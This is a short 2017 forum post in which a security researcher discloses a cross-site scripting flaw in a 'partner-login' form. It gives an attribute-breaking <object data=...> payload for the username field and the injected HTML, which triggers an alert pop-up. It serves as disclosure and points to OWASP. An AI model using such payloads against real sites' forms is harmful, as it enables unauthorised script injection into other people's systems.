Page 1 of 1

XSS vulnerability in partner-login

PostPosted: Tue Jan 31, 2017 8:12 pm
by hddananjaya
Cross Site Scripting(XSS) vulnerability in partner-login

Study Case :

Payload :
username :
Code: Select all
"><object data=alert('@_hddananjaya')>

password : anything

Then what happens :
HTML code will replace like this
Code: Select all
<input id="login" type="text" class="form-control" name="login" placeholder="Enter username" style="color:#000" autofocus value=""><object data=javascript:alert('@_hddananjaya')>">

Result : <object data=javascript:alert('@_hddananjaya')> will execute and pop-up will show my twitter id

How bad is it and how to prevent : visit Open Web Application Security Project (OWASP)

HD Dananjaya (@_hddananjaya)
Cyber Security Researcher